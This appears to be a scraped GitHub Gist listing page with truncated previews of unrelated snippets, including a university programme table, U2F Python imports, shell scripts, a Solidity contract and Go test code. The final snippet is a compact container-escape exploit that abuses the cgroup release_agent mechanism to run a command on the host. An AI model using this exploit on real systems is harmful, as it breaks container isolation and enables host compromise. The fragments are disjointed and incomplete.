-
7695 https://www.tugraz.at/index.php?id=7695
-
Die Beglaubigung von Urkunden des Ausstellungslandes Ihrer Dokumente ist derzeit ausgesetzt. >
-
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
study programme number | study programme name | study programme type | |
---|---|---|---|
221 | Geodesy | Bachelor programme | |
211 | Information and Computer Engineering | Bachelor programme | |
243 | Architecture | Bachelor programme | |
253 | Biomedical Engineering | Bachelor programme | |
273 | Chemical and Process Engineering | Bachelor programme | |
662 | Chemistry | Bachelor programme | |
264 | Civil Engineering Sciences and Construction Management | Bachelor programme | |
521 | Computer Science | Bachelor programme | |
235 | Electrical Engineering | Bachelor programme |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from u2flib_host import u2f, exc | |
from u2flib_host.utils import websafe_encode, websafe_decode | |
from u2flib_host.register import register | |
from u2flib_host.authenticate import authenticate | |
import json | |
import struct | |
import base64 | |
# Using https://github.com/Yubico/python-u2flib-host | |
# See also: https://webauthn.guide/#webauthn-api |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Get desktop-app (which includes CLI) from http://get.diagrams.net | |
NUM_PAGES=4 | |
DRAWIO_FILE="cdn-setup1" | |
#set -o xtrace | |
for ((page=0; page<NUM_PAGES; page++)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
pragma solidity >=0.4.22 <0.7.0; | |
/** | |
* @title VerrStorage | |
* @dev Store & retreive value in a variable | |
*/ | |
contract VerrStorage { | |
address payable public owner = msg.sender; | |
uint public creationTime = block.timestamp; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[pomodoro] | |
command=~/.i3/i3blocks/pomodoro.sh $BLOCK_BUTTON | |
interval=1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# sudo apt install zenity ffmpeg | |
error() { | |
zenity --error --text "Fehler: $1" --title "Fehler" --ellipsize | |
exit | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import "fmt" | |
func testLE() { | |
teststring1 := "Test1" | |
var testint1 int64 = 111 | |
a1 := authzModel{ | |
ID: testint1, | |
IdentifierValue: teststring1, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` | |
mkdir -p $d/w | |
echo 1 > $d/w/notify_on_release | |
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` | |
touch /o | |
echo $t/c >$d/release_agent | |
echo "#!/bin/sh $1 >$t/o" >/c | |
chmod +x /c | |
sh -c "echo 0 >$d/w/cgroup.procs" | |
sleep 1 |